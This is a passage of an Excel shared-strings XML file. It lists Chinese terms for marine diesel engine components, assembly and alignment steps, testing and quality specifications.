        <charset val="134"/>
      </rPr>
      <t>悬挂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>位置传器器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>灯具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>开关部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>多功能插座</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电预热器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>节流阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>淡水分配管支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>密封剂</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>硅树脂粘接剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>金属粘合剂</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不清楚的图纸</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴采购规格</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>管接头部件</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>压力表板安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>电缆接头安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器连接</t>
    </r>
  </si>
  <si>
    <r>
      <t>WOODWARD</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>防护螺栓</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滑车刹车</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>圆鼻形工具，左侧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>成形工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>弹簧工具</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>倒置刮修工具</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>特殊密封环</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>预期噪声等级</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>接头，安装说明</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>气动扭力扳手</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>传感器装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机座对中铰孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>刮油环保护孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>保护前端孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>固定</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>横梁铰孔对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导板对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铰孔</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>长贯穿螺栓</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>铁支撑</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴承</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>连杆</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体和机架对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套壳体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>换向机构</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>扫气箱装配</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞安装和找中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>滚轮导套和凸轮轴箱对中</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲柄轴承检查</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>活塞冷却和出口管安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖和冷却水管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸盖</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种阀</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>阀驱动齿轮</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>-</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>燃油泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>控制轴对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>销</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>注油器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>调速器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体安装对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体铰孔装配</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>泵</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>自动换向</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>机架机座对中</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>顶部拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>链条张紧</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>+</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>导向安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t>/</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>缸套成品</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>内部电缆槽</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵台安装</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>安装轴承监控系统</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>增压器和集管安装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>各种温度计体</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试用油和水</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试完成</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>发运时重新组装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>操纵侧中层走台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>后侧中层走台</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">    </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>曲轴上的力矩补偿器</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>补偿器定位销安装拆卸</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件拆包</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>部件取出和组装</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>不带补偿器运行</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve">   </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>测试图号</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>直列机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <t>V</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>形机</t>
    </r>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="Arial"/>
        <family val="2"/>
      </rPr>
      <t xml:space="preserve"> </t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>柴油机性能</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>废气数据</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>附带离心泵</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量程序</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>质量规范</t>
    </r>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="10"/>
        <color theme="1"/>
        <rFont val="宋体"/>
        <family val="3"/>
        <charset val="134"/>
      </rPr>
      <t>检查规范</t>
    </r>
  </si>
  <si>
    <r>
